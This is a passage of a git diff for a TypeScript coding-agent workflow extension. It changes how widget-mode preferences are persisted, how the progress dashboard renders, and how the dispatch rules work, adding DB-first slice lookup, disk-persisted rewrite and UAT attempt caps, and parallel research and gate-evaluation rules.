+  const raw = safeReadTextFile(path);
+  if (!raw) return undefined;
+  const prefs = parsePreferencesMarkdown(raw);
+  const saved = prefs?.widget_mode;
+  if (saved && WIDGET_MODES.includes(saved as WidgetMode)) {
+    return saved as WidgetMode;
+  }
+  return undefined;
+}
+
+function resolveWidgetModePreferencePath(
+  projectPath = getProjectGSDPreferencesPath(),
+  globalPath = getGlobalGSDPreferencesPath(),
+): string {
+  if (readWidgetModeFromFile(projectPath)) {
+    return projectPath;
+  }
+
+  if (readWidgetModeFromFile(globalPath)) {
+    return globalPath;
+  }
+
+  if (safeReadTextFile(projectPath) !== null) return projectPath;
+  if (safeReadTextFile(globalPath) !== null) return globalPath;
+  return getGlobalGSDPreferencesPath();
+}
 
 /** Load widget mode from preferences (once). */
-function ensureWidgetModeLoaded(): void {
+function ensureWidgetModeLoaded(projectPath?: string, globalPath?: string): void {
   if (widgetModeInitialized) return;
   widgetModeInitialized = true;
   try {
-    const loaded = loadEffectiveGSDPreferences();
-    const saved = loaded?.preferences?.widget_mode;
+    const resolvedProjectPath = projectPath ?? getProjectGSDPreferencesPath();
+    const resolvedGlobalPath = globalPath ?? getGlobalGSDPreferencesPath();
+    const saved = readWidgetModeFromFile(resolvedProjectPath) ?? readWidgetModeFromFile(resolvedGlobalPath);
     if (saved && WIDGET_MODES.includes(saved as WidgetMode)) {
       widgetMode = saved as WidgetMode;
     }
-  } catch { /* non-fatal — use default */ }
+    widgetModePreferencePath = resolveWidgetModePreferencePath(resolvedProjectPath, resolvedGlobalPath);
+  } catch (err) { /* non-fatal — use default */
+    logWarning("dashboard", `operation failed: ${getErrorMessage(err)}`);
+    widgetModePreferencePath = getGlobalGSDPreferencesPath();
+  }
 }
 
-/** Persist widget mode to global preferences YAML. */
-function persistWidgetMode(mode: WidgetMode): void {
+/**
+ * Persist widget mode to the preference file that owns the effective value.
+ * Project-scoped widget_mode wins over global; if neither scope defines it,
+ * we prefer an existing project preferences file and otherwise fall back to
+ * the global preferences file.
+ */
+function persistWidgetMode(
+  mode: WidgetMode,
+  prefsPath = widgetModePreferencePath ?? resolveWidgetModePreferencePath(),
+): void {
   try {
-    const prefsPath = getGlobalGSDPreferencesPath();
     let content = "";
     if (existsSync(prefsPath)) {
       content = readFileSync(prefsPath, "utf-8");
@@ -377,30 +455,40 @@ function persistWidgetMode(mode: WidgetMode): void {
       content = content.trimEnd() + "\n" + line + "\n";
     }
     writeFileSync(prefsPath, content, "utf-8");
-  } catch { /* non-fatal — mode still set in memory */ }
+  } catch (err) { /* non-fatal — mode still set in memory */
+    logWarning("dashboard", `file write failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
 }
 
 /** Cycle to the next widget mode. Returns the new mode. */
-export function cycleWidgetMode(): WidgetMode {
-  ensureWidgetModeLoaded();
+export function cycleWidgetMode(projectPath?: string, globalPath?: string): WidgetMode {
+  ensureWidgetModeLoaded(projectPath, globalPath);
   const idx = WIDGET_MODES.indexOf(widgetMode);
   widgetMode = WIDGET_MODES[(idx + 1) % WIDGET_MODES.length];
-  persistWidgetMode(widgetMode);
+  persistWidgetMode(widgetMode, widgetModePreferencePath ?? resolveWidgetModePreferencePath(projectPath, globalPath));
   return widgetMode;
 }
 
 /** Set widget mode directly. */
-export function setWidgetMode(mode: WidgetMode): void {
+export function setWidgetMode(mode: WidgetMode, projectPath?: string, globalPath?: string): void {
+  ensureWidgetModeLoaded(projectPath, globalPath);
   widgetMode = mode;
-  persistWidgetMode(widgetMode);
+  persistWidgetMode(widgetMode, widgetModePreferencePath ?? resolveWidgetModePreferencePath(projectPath, globalPath));
 }
 
 /** Get current widget mode. */
-export function getWidgetMode(): WidgetMode {
-  ensureWidgetModeLoaded();
+export function getWidgetMode(projectPath?: string, globalPath?: string): WidgetMode {
+  ensureWidgetModeLoaded(projectPath, globalPath);
   return widgetMode;
 }
 
+/** Test-only reset for widget mode caching. */
+export function _resetWidgetModeForTests(): void {
+  widgetMode = "full";
+  widgetModeInitialized = false;
+  widgetModePreferencePath = null;
+}
+
 // ─── Progress Widget ──────────────────────────────────────────────────────────
 
 /** State accessors passed to updateProgressWidget to avoid direct global access */
@@ -412,6 +500,8 @@ export interface WidgetStateAccessors {
   isVerbose(): boolean;
   /** True while newSession() is in-flight — render must not access session state. */
   isSessionSwitching(): boolean;
+  /** Fully-qualified dispatched model ID (provider/id) set after model selection + hook overrides (#2899). */
+  getCurrentDispatchedModelId(): string | null;
 }
 
 export function updateProgressWidget(
@@ -440,7 +530,9 @@ export function updateProgressWidget(
 
   // Cache git branch at widget creation time (not per render)
   let cachedBranch: string | null = null;
-  try { cachedBranch = getCurrentBranch(accessors.getBasePath()); } catch { /* not in git repo */ }
+  try { cachedBranch = getCurrentBranch(accessors.getBasePath()); } catch (err) { /* not in git repo */
+    logWarning("dashboard", `git branch detection failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
 
   // Cache short pwd (last 2 path segments only) + worktree/branch info
   let widgetPwd: string;
@@ -470,6 +562,20 @@ export function updateProgressWidget(
     let pulseBright = true;
     let cachedLines: string[] | undefined;
     let cachedWidth: number | undefined;
+    let cachedRtkLabel: string | null | undefined;
+
+    const refreshRtkLabel = (): void => {
+      try {
+        const sessionId = ctx.sessionManager.getSessionId();
+        const savings = sessionId ? getRtkSessionSavings(accessors.getBasePath(), sessionId) : null;
+        cachedRtkLabel = formatRtkSavingsLabel(savings);
+      } catch (err) {
+        logWarning("dashboard", `RTK savings lookup failed: ${err instanceof Error ? (err as Error).message : String(err)}`);
+        cachedRtkLabel = null;
+      }
+    };
+
+    refreshRtkLabel();
 
     const pulseTimer = setInterval(() => {
       pulseBright = !pulseBright;
@@ -481,12 +587,17 @@ export function updateProgressWidget(
     // task/slice completion mid-unit. Without this, the progress bar only
     // updates at dispatch time, appearing frozen during long-running units.
     // 15s (vs 5s) reduces synchronous file I/O on the hot path.
-    const progressRefreshTimer = mid ? setInterval(() => {
+    const progressRefreshTimer = setInterval(() => {
       try {
-        updateSliceProgressCache(accessors.getBasePath(), mid.id, slice?.id);
+        if (mid) {
+          updateSliceProgressCache(accessors.getBasePath(), mid.id, slice?.id);
+        }
+        refreshRtkLabel();
         cachedLines = undefined;
-      } catch { /* non-fatal */ }
-    }, 15_000) : null;
+      } catch (err) { /* non-fatal */
+        logWarning("dashboard", `DB status update failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
+    }, 15_000);
 
     return {
       render(width: number): string[] {
@@ -535,6 +646,14 @@ export function updateProgressWidget(
           : "";
         lines.push(rightAlign(headerLeft, headerRight, width));
 
+        // Worktree/branch right-aligned below header
+        const branchLabel = worktreeName && cachedBranch
+          ? `${worktreeName} (${cachedBranch})`
+          : cachedBranch ?? "";
+        if (branchLabel) {
+          lines.push(rightAlign("", theme.fg("dim", branchLabel), width));
+        }
+
         // Show health signal details when degraded (yellow/red)
         if (score.level !== "green" && score.signals.length > 0 && widgetMode !== "min") {
           // Show up to 3 most relevant signals in compact form
@@ -575,9 +694,15 @@ export function updateProgressWidget(
         const cxPctVal = cxUsage?.percent ?? 0;
         const cxPct = cxUsage?.percent !== null ? cxPctVal.toFixed(1) : "?";
 
-        // Model display — shown in context section, not stats
-        const modelId = cmdCtx?.model?.id ?? "";
-        const modelProvider = cmdCtx?.model?.provider ?? "";
+        // Model display — prefer dispatched model ID (set after selectAndApplyModel
+        // + hook overrides) over cmdCtx?.model which can be stale (#2899).
+        const dispatchedModelId = accessors.getCurrentDispatchedModelId();
+        const modelId = dispatchedModelId
+          ? dispatchedModelId.split("/").slice(1).join("/") || dispatchedModelId
+          : (cmdCtx?.model?.id ?? "");
+        const modelProvider = dispatchedModelId
+          ? dispatchedModelId.split("/")[0] || ""
+          : (cmdCtx?.model?.provider ?? "");
         const tierIcon = resolveServiceTierIcon(effectiveServiceTier, modelId);
         const modelDisplay = (modelProvider && modelId
           ? `${modelProvider}/${modelId}`
@@ -648,12 +773,12 @@ export function updateProgressWidget(
         const hasContext = !!(mid || (slice && unitType !== "research-milestone" && unitType !== "plan-milestone"));
         if (mid) {
           const modelTag = modelDisplay ? theme.fg("muted", `  ${modelDisplay}`) : "";
-          lines.push(truncateToWidth(`${pad}${theme.fg("dim", mid.title)}${modelTag}`, width));
+          lines.push(truncateToWidth(`${pad}${theme.fg("dim", mid.title)}${modelTag}`, width, "…"));
         }
         if (slice && unitType !== "research-milestone" && unitType !== "plan-milestone") {
           lines.push(truncateToWidth(
             `${pad}${theme.fg("text", theme.bold(`${slice.id}: ${slice.title}`))}`,
-            width,
+            width, "…",
           ));
         }
         if (hasContext) lines.push("");
@@ -699,6 +824,12 @@ export function updateProgressWidget(
         const rightLines: string[] = [];
         const maxVisibleTasks = 8;
 
+        // Max visible chars for task title text (before ANSI theming)
+        const maxTaskTitleLen = 45;
+        function truncTitle(s: string): string {
+          return s.length > maxTaskTitleLen ? s.slice(0, maxTaskTitleLen - 1) + "…" : s;
+        }
+
         function formatTaskLine(t: { id: string; title: string; done: boolean }, isCurrent: boolean): string {
           const glyph = t.done
             ? theme.fg("success", "*")
@@ -710,11 +841,12 @@ export function updateProgressWidget(
             : t.done
               ? theme.fg("muted", t.id)
               : theme.fg("dim", t.id);
+          const short = truncTitle(t.title);
           const title = isCurrent
-            ? theme.fg("text", t.title)
+            ? theme.fg("text", short)
             : t.done
-              ? theme.fg("muted", t.title)
-              : theme.fg("text", t.title);
+              ? theme.fg("muted", short)
+              : theme.fg("text", short);
           return `${glyph} ${id}: ${title}`;
         }
 
@@ -737,7 +869,7 @@ export function updateProgressWidget(
           if (maxRows > 0) {
             lines.push("");
             for (let i = 0; i < maxRows; i++) {
-              const left = padToWidth(truncateToWidth(leftLines[i] ?? "", leftColWidth), leftColWidth);
+              const left = padToWidth(truncateToWidth(leftLines[i] ?? "", leftColWidth, "…"), leftColWidth);
               const right = rightLines[i] ?? "";
               lines.push(`${left}${right}`);
             }
@@ -745,7 +877,7 @@ export function updateProgressWidget(
         } else {
           if (leftLines.length > 0) {
             lines.push("");
-            for (const l of leftLines) lines.push(truncateToWidth(l, width));
+            for (const l of leftLines) lines.push(truncateToWidth(l, width, "…"));
           }
         }
 
@@ -770,24 +902,31 @@ export function updateProgressWidget(
           if (statsLine) {
             lines.push(rightAlign("", statsLine, width));
           }
+          if (cachedRtkLabel) {
+            lines.push(rightAlign("", theme.fg("dim", cachedRtkLabel), width));
+          }
         }
-        // PWD line with last commit info right-aligned
+        // Last commit info
         const lastCommit = getLastCommit(accessors.getBasePath());
-        const commitStr = lastCommit
-          ? theme.fg("dim", `${lastCommit.timeAgo} ago: ${lastCommit.message}`)
+        const maxCommitLen = 65;
+        const commitMsg = lastCommit
+          ? lastCommit.message.length > maxCommitLen
+            ? lastCommit.message.slice(0, maxCommitLen - 1) + "…"
+            : lastCommit.message
           : "";
-        const pwdStr = theme.fg("dim", widgetPwd);
-        if (commitStr) {
-          lines.push(rightAlign(`${pad}${pwdStr}`, truncateToWidth(commitStr, Math.floor(width * 0.45)), width));
-        } else {
-          lines.push(`${pad}${pwdStr}`);
-        }
         // Hints line
         const hintParts: string[] = [];
         hintParts.push("esc pause");
-        hintParts.push(process.platform === "darwin" ? "⌃⌥G dashboard" : "Ctrl+Alt+G dashboard");
+        hintParts.push(`${formatShortcut("Ctrl+Alt+G")} dashboard`);
         const hintStr = theme.fg("dim", hintParts.join(" | "));
-        lines.push(rightAlign("", hintStr, width));
+        const commitStr = lastCommit
+          ? theme.fg("dim", `${lastCommit.timeAgo} ago: ${commitMsg}`)
+          : "";
+        if (commitStr) {
+          lines.push(rightAlign(`${pad}${commitStr}`, hintStr, width));
+        } else {
+          lines.push(rightAlign("", hintStr, width));
+        }
 
         lines.push(...ui.bar());
 
@@ -814,12 +953,12 @@ function rightAlign(left: string, right: string, width: number): string {
   const leftVis = visibleWidth(left);
   const rightVis = visibleWidth(right);
   const gap = Math.max(1, width - leftVis - rightVis);
-  return truncateToWidth(left + " ".repeat(gap) + right, width);
+  return truncateToWidth(left + " ".repeat(gap) + right, width, "…");
 }
 
 /** Pad a string with trailing spaces to fill exactly `colWidth` (ANSI-aware). */
 function padToWidth(s: string, colWidth: number): string {
   const vis = visibleWidth(s);
-  if (vis >= colWidth) return truncateToWidth(s, colWidth);
+  if (vis >= colWidth) return truncateToWidth(s, colWidth, "…");
   return s + " ".repeat(colWidth - vis);
 }
diff --git a/src/resources/extensions/gsd/auto-direct-dispatch.ts b/src/resources/extensions/gsd/auto-direct-dispatch.ts
index 88b51d3dc..ab89687be 100644
--- a/src/resources/extensions/gsd/auto-direct-dispatch.ts
+++ b/src/resources/extensions/gsd/auto-direct-dispatch.ts
@@ -9,7 +9,9 @@ import type {
 } from "@gsd/pi-coding-agent";
 
 import { deriveState } from "./state.js";
-import { loadFile, parseRoadmap } from "./files.js";
+import { loadFile } from "./files.js";
+import { isDbAvailable, getMilestoneSlices } from "./gsd-db.js";
+import { parseRoadmap } from "./parsers-legacy.js";
 import {
   resolveMilestoneFile, resolveSliceFile, relSliceFile,
 } from "./paths.js";
@@ -151,19 +153,26 @@ export async function dispatchDirectPhase(
 
     case "reassess":
     case "reassess-roadmap": {
-      const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
-      const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-      if (!roadmapContent) {
-        ctx.ui.notify("Cannot dispatch reassess-roadmap: no roadmap found.", "warning");
-        return;
+      // DB primary path — get completed slices, fall back to file parsing when DB has no data
+      let completedSliceIds: string[] = [];
+      if (isDbAvailable()) {
+        completedSliceIds = getMilestoneSlices(mid).filter(s => s.status === "complete").map(s => s.id);
       }
-      const roadmap = parseRoadmap(roadmapContent);
-      const completedSlices = roadmap.slices.filter(s => s.done);
-      if (completedSlices.length === 0) {
+      if (completedSliceIds.length === 0) {
+        // File-based fallback: parse roadmap checkboxes
+        const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP");
+        if (roadmapPath) {
+          const roadmapContent = await loadFile(roadmapPath);
+          if (roadmapContent) {
+            completedSliceIds = parseRoadmap(roadmapContent).slices.filter(s => s.done).map(s => s.id);
+          }
+        }
+      }
+      if (completedSliceIds.length === 0) {
         ctx.ui.notify("Cannot dispatch reassess-roadmap: no completed slices.", "warning");
         return;
       }
-      const completedSliceId = completedSlices[completedSlices.length - 1].id;
+      const completedSliceId = completedSliceIds[completedSliceIds.length - 1];
       unitType = "reassess-roadmap";
       unitId = `${mid}/${completedSliceId}`;
       prompt = await buildReassessRoadmapPrompt(mid, midTitle, completedSliceId, base);
@@ -176,19 +185,25 @@ export async function dispatchDirectPhase(
       // incomplete) slice. After slice completion, state.activeSlice advances
       // to the next incomplete slice, so we find the last done slice from the
       // roadmap instead (#1693).
-      const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
-      const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-      if (!roadmapContent) {
-        ctx.ui.notify("Cannot dispatch run-uat: no roadmap found.", "warning");
-        return;
+      let uatCompletedSliceIds: string[] = [];
+      if (isDbAvailable()) {
+        uatCompletedSliceIds = getMilestoneSlices(mid).filter(s => s.status === "complete").map(s => s.id);
       }
-      const roadmap = parseRoadmap(roadmapContent);
-      const completedSlices = roadmap.slices.filter(s => s.done);
-      if (completedSlices.length === 0) {
+      if (uatCompletedSliceIds.length === 0) {
+        // File-based fallback: parse roadmap checkboxes
+        const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP");
+        if (roadmapPath) {
+          const roadmapContent = await loadFile(roadmapPath);
+          if (roadmapContent) {
+            uatCompletedSliceIds = parseRoadmap(roadmapContent).slices.filter(s => s.done).map(s => s.id);
+          }
+        }
+      }
+      if (uatCompletedSliceIds.length === 0) {
         ctx.ui.notify("Cannot dispatch run-uat: no completed slices.", "warning");
         return;
       }
-      const sid = completedSlices[completedSlices.length - 1].id;
+      const sid = uatCompletedSliceIds[uatCompletedSliceIds.length - 1];
       const uatFile = resolveSliceFile(base, mid, sid, "UAT");
       if (!uatFile) {
         ctx.ui.notify("Cannot dispatch run-uat: no UAT file found.", "warning");
diff --git a/src/resources/extensions/gsd/auto-dispatch.ts b/src/resources/extensions/gsd/auto-dispatch.ts
index 97ee888fb..0abb5108f 100644
--- a/src/resources/extensions/gsd/auto-dispatch.ts
+++ b/src/resources/extensions/gsd/auto-dispatch.ts
@@ -12,8 +12,12 @@
 import type { GSDState } from "./types.js";
 import type { GSDPreferences } from "./preferences.js";
 import type { UatType } from "./files.js";
-import { loadFile, extractUatType, loadActiveOverrides, parseRoadmap } from "./files.js";
+import { loadFile, extractUatType, loadActiveOverrides } from "./files.js";
+import { isDbAvailable, getMilestoneSlices, getPendingGates, markAllGatesOmitted, getMilestone } from "./gsd-db.js";
+import { extractVerdict, isAcceptableUatVerdict } from "./verdict-parser.js";
+
 import {
+  gsdRoot,
   resolveMilestoneFile,
   resolveMilestonePath,
   resolveSliceFile,
@@ -23,7 +27,9 @@ import {
   buildMilestoneFileName,
   buildSliceFileName,
 } from "./paths.js";
-import { existsSync, mkdirSync, writeFileSync } from "node:fs";
+import { parseRoadmap } from "./parsers-legacy.js";
+import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs";
+import { logWarning, logError } from "./workflow-logger.js";
 import { join } from "node:path";
 import { hasImplementationArtifacts } from "./auto-recovery.js";
 import {
@@ -41,6 +47,8 @@ import {
   buildReassessRoadmapPrompt,
   buildRewriteDocsPrompt,
   buildReactiveExecutePrompt,
+  buildGateEvaluatePrompt,
+  buildParallelResearchSlicesPrompt,
   checkNeedsReassessment,
   checkNeedsRunUat,
 } from "./auto-prompts.js";
@@ -84,10 +92,95 @@ function missingSliceStop(mid: string, phase: string): DispatchAction {
   };
 }
 
+/**
+ * Check for milestone slices missing SUMMARY files.
+ * Returns array of missing slice IDs, or empty array if all present or DB unavailable.
+ *
+ * Excludes skipped slices (intentionally summary-less) and legacy-complete
+ * slices whose DB status is authoritative even without on-disk SUMMARY (#3620).
+ */
+function findMissingSummaries(basePath: string, mid: string): string[] {
+  if (!isDbAvailable()) return [];
+  const slices = getMilestoneSlices(mid);
+  // Skipped slices never produce SUMMARYs; legacy-complete slices may lack them
+  const CLOSED_STATUSES = new Set(["skipped", "complete", "done"]);
+  return slices
+    .filter(s => !CLOSED_STATUSES.has(s.status))
+    .filter(s => {
+      const summaryPath = resolveSliceFile(basePath, mid, s.id, "SUMMARY");
+      return !summaryPath || !existsSync(summaryPath);
+    })
+    .map(s => s.id);
+}
+
 // ─── Rewrite Circuit Breaker ──────────────────────────────────────────────
 
 const MAX_REWRITE_ATTEMPTS = 3;
 
+// ─── Disk-persisted rewrite attempt counter ──────────────────────────────────
+// The counter must survive session restarts (crash recovery, pause/resume,
+// step-mode). Storing it on the in-memory session object caused the circuit
+// breaker to never trip — see https://github.com/gsd-build/gsd-2/issues/2203
+function rewriteCountPath(basePath: string): string {
+  return join(gsdRoot(basePath), "runtime", "rewrite-count.json");
+}
+
+export function getRewriteCount(basePath: string): number {
+  try {
+    const data = JSON.parse(readFileSync(rewriteCountPath(basePath), "utf-8"));
+    return typeof data.count === "number" ? data.count : 0;
+  } catch {
+    return 0;
+  }
+}
+
+export function setRewriteCount(basePath: string, count: number): void {
+  const filePath = rewriteCountPath(basePath);
+  mkdirSync(join(gsdRoot(basePath), "runtime"), { recursive: true });
+  writeFileSync(filePath, JSON.stringify({ count, updatedAt: new Date().toISOString() }) + "\n");
+}
+
+// ─── Run-UAT dispatch counter (per-slice) ────────────────────────────────
+// Caps run-uat dispatches to prevent infinite replay when verification
+// commands fail before writing a verdict (#3624).
+const MAX_UAT_ATTEMPTS = 3;
+
+function uatCountPath(basePath: string, mid: string, sid: string): string {
+  return join(gsdRoot(basePath), "runtime", `uat-count-${mid}-${sid}.json`);
+}
+
+export function getUatCount(basePath: string, mid: string, sid: string): number {
+  try {
+    const data = JSON.parse(readFileSync(uatCountPath(basePath, mid, sid), "utf-8"));
+    return typeof data.count === "number" ? data.count : 0;
+  } catch {
+    return 0;
+  }
+}
+
+export function incrementUatCount(basePath: string, mid: string, sid: string): number {
+  const count = getUatCount(basePath, mid, sid) + 1;
+  const filePath = uatCountPath(basePath, mid, sid);
+  mkdirSync(join(gsdRoot(basePath), "runtime"), { recursive: true });
+  writeFileSync(filePath, JSON.stringify({ count, updatedAt: new Date().toISOString() }) + "\n");
+  return count;
+}
+
+// ─── Helpers ─────────────────────────────────────────────────────────────
+
+/**
+ * Returns true when the verification_operational value indicates that no
+ * operational verification is needed.  Covers common phrasings the planning
+ * agent may use: "None", "None required", "N/A", "Not applicable", etc.
+ *
+ * @see https://github.com/gsd-build/gsd-2/issues/2931
+ */
+export function isVerificationNotApplicable(value: string): boolean {
+  const v = (value ?? "").toLowerCase().trim().replace(/[.\s]+$/, "");
+  if (!v || v === "none") return true;
+  return /^(?:none[\s._-]*(?:required|needed|planned)?|n\/?a|not[\s._-]+(?:applicable|required|needed|provided)|no[\s._-]+operational[\s\S]*)$/i.test(v);
+}
+
 // ─── Rules ────────────────────────────────────────────────────────────────
 
 export const DISPATCH_RULES: DispatchRule[] = [
@@ -96,14 +189,14 @@ export const DISPATCH_RULES: DispatchRule[] = [
     match: async ({ mid, midTitle, state, basePath, session }) => {
       const pendingOverrides = await loadActiveOverrides(basePath);
       if (pendingOverrides.length === 0) return null;
-      const count = session?.rewriteAttemptCount ?? 0;
+      const count = getRewriteCount(basePath);
       if (count >= MAX_REWRITE_ATTEMPTS) {
         const { resolveAllOverrides } = await import("./files.js");
         await resolveAllOverrides(basePath);
-        if (session) session.rewriteAttemptCount = 0;
+        setRewriteCount(basePath, 0);
         return null;
       }
-      if (session) session.rewriteAttemptCount++;
+      setRewriteCount(basePath, count + 1);
       const unitId = state.activeSlice ? `${mid}/${state.activeSlice.id}` : mid;
       return {
         action: "dispatch",
@@ -146,6 +239,16 @@ export const DISPATCH_RULES: DispatchRule[] = [
       const needsRunUat = await checkNeedsRunUat(basePath, mid, state, prefs);
       if (!needsRunUat) return null;
       const { sliceId, uatType } = needsRunUat;
+
+      // Cap run-uat dispatch attempts to prevent infinite replay (#3624)
+      const attempts = incrementUatCount(basePath, mid, sliceId);
+      if (attempts > MAX_UAT_ATTEMPTS) {
+        return {
+          action: "stop" as const,
+          reason: `run-uat for ${mid}/${sliceId} has been dispatched ${attempts - 1} times without producing a verdict. Verification commands may be broken — fix the UAT spec or manually write an ASSESSMENT verdict.`,
+          level: "warning" as const,
+        };
+      }
       const uatFile = resolveSliceFile(basePath, mid, sliceId, "UAT")!;
       const uatContent = await loadFile(uatFile);
       return {
@@ -159,7 +262,7 @@ export const DISPATCH_RULES: DispatchRule[] = [
           uatContent ?? "",
           basePath,
         ),
-        pauseAfterDispatch: uatType !== "artifact-driven" && uatType !== "browser-executable" && uatType !== "runtime-executable",
+        pauseAfterDispatch: !process.env.GSD_HEADLESS && uatType !== "artifact-driven" && uatType !== "browser-executable" && uatType !== "runtime-executable",
       };
     },
   },
@@ -170,21 +273,29 @@ export const DISPATCH_RULES: DispatchRule[] = [
       if (!prefs?.uat_dispatch) return null;
 
       const roadmapFile = resolveMilestoneFile(basePath, mid, "ROADMAP");
-      const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-      if (!roadmapContent) return null;
 
-      const roadmap = parseRoadmap(roadmapContent);
-      for (const slice of roadmap.slices.filter(s => s.done)) {
-        const resultFile = resolveSliceFile(basePath, mid, slice.id, "UAT-RESULT");
+      // DB-first: get completed slices from DB
+      let completedSliceIds: string[];
+      if (isDbAvailable()) {
+        completedSliceIds = getMilestoneSlices(mid)
+          .filter(s => s.status === "complete")
+          .map(s => s.id);
+      } else {
+        return null;
+      }
+
+      for (const sliceId of completedSliceIds) {
+        const resultFile = resolveSliceFile(basePath, mid, sliceId, "UAT");
         if (!resultFile) continue;
         const content = await loadFile(resultFile);
         if (!content) continue;
-        const verdictMatch = content.match(/verdict:\s*([\w-]+)/i);
-        const verdict = verdictMatch?.[1]?.toLowerCase();
-        if (verdict && verdict !== "pass" && verdict !== "passed") {
+        const verdict = extractVerdict(content);
+        const uatType = extractUatType(content);
+
+        if (verdict && !isAcceptableUatVerdict(verdict, uatType)) {
           return {
             action: "stop" as const,
-            reason: `UAT verdict for ${slice.id} is "${verdict}" — blocking progression until resolved.\nReview the UAT result and update the verdict to PASS, or re-run /gsd auto after fixing.`,
+            reason: `UAT verdict for ${sliceId} is "${verdict}" — blocking progression until resolved.\nReview the UAT result and update the verdict to PASS, or re-run /gsd auto after fixing.`,
             level: "warning" as const,
           };
         }
@@ -267,6 +378,55 @@ export const DISPATCH_RULES: DispatchRule[] = [
       };
     },
   },
+  {
+    // Keep this rule before the single-slice research rule so the multi-slice
+    // path wins whenever 2+ slices are ready.
+    name: "planning (multiple slices need research) → parallel-research-slices",
+    match: async ({ state, mid, midTitle, basePath, prefs }) => {
+      if (state.phase !== "planning") return null;
+      if (prefs?.phases?.skip_research || prefs?.phases?.skip_slice_research) return null;
+
+      // Load roadmap to find all slices
+      const roadmapFile = resolveMilestoneFile(basePath, mid, "ROADMAP");
+      const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
+      if (!roadmapContent) return null;
+      const roadmap = parseRoadmap(roadmapContent);
+
+      // Find slices that need research (no RESEARCH file, dependencies done)
+      const milestoneResearchFile = resolveMilestoneFile(basePath, mid, "RESEARCH");
+      const researchReadySlices: Array<{ id: string; title: string }> = [];
+
+      for (const slice of roadmap.slices) {
+        if (slice.done) continue;
+        // Skip S01 when milestone research exists
+        if (milestoneResearchFile && slice.id === "S01") continue;
+        // Skip if already has research
+        if (resolveSliceFile(basePath, mid, slice.id, "RESEARCH")) continue;
+        // Skip if dependencies aren't done (check for SUMMARY files)
+        const depsComplete = (slice.depends ?? []).every((depId) =>
+          !!resolveSliceFile(basePath, mid, depId, "SUMMARY"),
+        );
+        if (!depsComplete) continue;
+
+        researchReadySlices.push({ id: slice.id, title: slice.title });
+      }
+
+      // Only dispatch parallel if 2+ slices are ready
+      if (researchReadySlices.length < 2) return null;
+
+      return {
+        action: "dispatch",
+        unitType: "research-slice",
+        unitId: `${mid}/parallel-research`,
+        prompt: await buildParallelResearchSlicesPrompt(
+          mid,
+          midTitle,
+          researchReadySlices,
+          basePath,
+        ),
+      };
+    },
+  },
   {
     name: "planning (no research, not S01) → research-slice",
     match: async ({ state, mid, midTitle, basePath, prefs }) => {
@@ -322,6 +482,38 @@ export const DISPATCH_RULES: DispatchRule[] = [
       };
     },
   },
+  {
+    name: "evaluating-gates → gate-evaluate",
+    match: async ({ state, mid, midTitle, basePath, prefs }) => {
+      if (state.phase !== "evaluating-gates") return null;
+      if (!state.activeSlice) return missingSliceStop(mid, state.phase);
+      const sid = state.activeSlice.id;
+      const sTitle = state.activeSlice.title;
+
+      // Gate evaluation is opt-in via preferences
+      const gateConfig = prefs?.gate_evaluation;
+      if (!gateConfig?.enabled) {
+        markAllGatesOmitted(mid, sid);
+        return { action: "skip" };
+      }
+
+      const pending = getPendingGates(mid, sid, "slice");
+      if (pending.length === 0) return { action: "skip" };
+
+      return {
+        action: "dispatch",
+        unitType: "gate-evaluate",
+        unitId: `${mid}/${sid}/gates+${pending.map(g => g.gate_id).join(",")}`,
+        prompt: await buildGateEvaluatePrompt(
+          mid,
+          midTitle,
+          sid,
+          sTitle,
+          basePath,
+        ),
+      };
+    },
+  },
   {
     name: "replanning-slice → replan-slice",
     match: async ({ state, mid, midTitle, basePath }) => {
@@ -430,7 +622,7 @@ export const DISPATCH_RULES: DispatchRule[] = [
         };
       } catch (err) {
         // Non-fatal — fall through to sequential execution
-        process.stderr.write(`gsd-reactive: graph derivation failed: ${(err as Error).message}\n`);
+        logError("dispatch", "reactive graph derivation failed", { error: (err as Error).message });
         return null;
       }
     },
@@ -499,26 +691,14 @@ export const DISPATCH_RULES: DispatchRule[] = [
       if (state.phase !== "validating-milestone") return null;
 
       // Safety guard (#1368): verify all roadmap slices have SUMMARY files before
-      // allowing milestone validation. If any slice lacks a summary, the milestone
-      // is not genuinely complete — something skipped earlier slices.
-      const roadmapFile = resolveMilestoneFile(basePath, mid, "ROADMAP");
-      const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-      if (roadmapContent) {
-        const roadmap = parseRoadmap(roadmapContent);
-        const missingSlices: string[] = [];
-        for (const slice of roadmap.slices) {
-          const summaryPath = resolveSliceFile(basePath, mid, slice.id, "SUMMARY");
-          if (!summaryPath || !existsSync(summaryPath)) {
-            missingSlices.push(slice.id);
-          }
-        }
-        if (missingSlices.length > 0) {
-          return {
-            action: "stop",
-            reason: `Cannot validate milestone ${mid}: slices ${missingSlices.join(", ")} are missing SUMMARY files. These slices may have been skipped.`,
-            level: "error",
-          };
-        }
+      // allowing milestone validation.
+      const missingSlices = findMissingSummaries(basePath, mid);
+      if (missingSlices.length > 0) {
+        return {
+          action: "stop",
+          reason: `Cannot validate milestone ${mid}: slices ${missingSlices.join(", ")} are missing SUMMARY files. These slices may have been skipped.`,
+          level: "error",
+        };
       }
 
       // Skip preference: write a minimal pass-through VALIDATION file
@@ -557,37 +737,87 @@ export const DISPATCH_RULES: DispatchRule[] = [
     match: async ({ state, mid, midTitle, basePath }) => {
       if (state.phase !== "completing-milestone") return null;
 
-      // Safety guard (#1368): verify all roadmap slices have SUMMARY files.
-      const roadmapFile = resolveMilestoneFile(basePath, mid, "ROADMAP");
-      const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-      if (roadmapContent) {
-        const roadmap = parseRoadmap(roadmapContent);
-        const missingSlices: string[] = [];
-        for (const slice of roadmap.slices) {
-          const summaryPath = resolveSliceFile(basePath, mid, slice.id, "SUMMARY");
-          if (!summaryPath || !existsSync(summaryPath)) {
